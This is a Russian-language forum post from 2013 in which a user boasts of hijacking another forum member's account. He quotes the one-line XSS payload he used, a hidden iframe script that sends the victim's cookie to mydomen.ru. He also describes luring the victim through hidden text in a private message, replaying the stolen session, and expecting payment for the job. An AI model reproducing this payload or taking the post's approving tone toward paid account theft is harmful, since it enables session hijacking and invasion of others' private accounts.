вечный_бродяга
( )
12/02/2013 09:18:57
Re: Про одного здешнего нехорошего человека

Цитата:

Я конечно осознаю, что юный Хацкер слегка спизднул приукрасил, но блин речь идет о том, что предъявителю сего можно все, так как он крутой Хацкер! Обидно слЮшай!



Да не обижайся так Кайфа от доступа к чужим аккаунтам нет совсем.  В твою переписку я даже не входил. Интереса не было совсем.
Глянул одним глазом только что там примероно 30 входящих и почти нет исходящих и всё. Ну и IP твой. Так... Ради интереса. Читать ничё не читал.
А во взломе для меня был приколен сам процесс.
Взлом был сделан всего одной строчкой офигенско клёвого с моей точки зрения кода,
Цитата:

<ifrаme style="with:0px;height:0px;" srс="jаvаscritp: dоcument . writе('<scr' + 'ipt>location=\'http://mydomen.ru/?params=\' + parent.cookie</scr' + 'ipt>')"></ifrаme>



на который я смотрел и скупая мужская слеза текла по щеке.
Потом всё это дело было послано по личке крестоносцу скрытым текстом, который он не видел. А видел он только предложение посмотреть анкетку одной феи.
Всё... Оставалось ложиться спать и ждать.
На утро захожу на почту и вижу два письма с сессией Это было клёвое ощущение!
Подставил присланные параметры в свой браузер и сходу зашёл!!
Самое клёвое чувство Круче оргазма)))
Конечное, итоговое впечатление было подпорчено отсутствием денег за проделанную работу. Но в жизни так бывает. Ещё раз доказательство, что надо всегда брать 50% предоплаты чтобы понять что человек настроен действительно серьёзно.

P.S. описанная дырка закрыта и код на этом форуме уже не работает.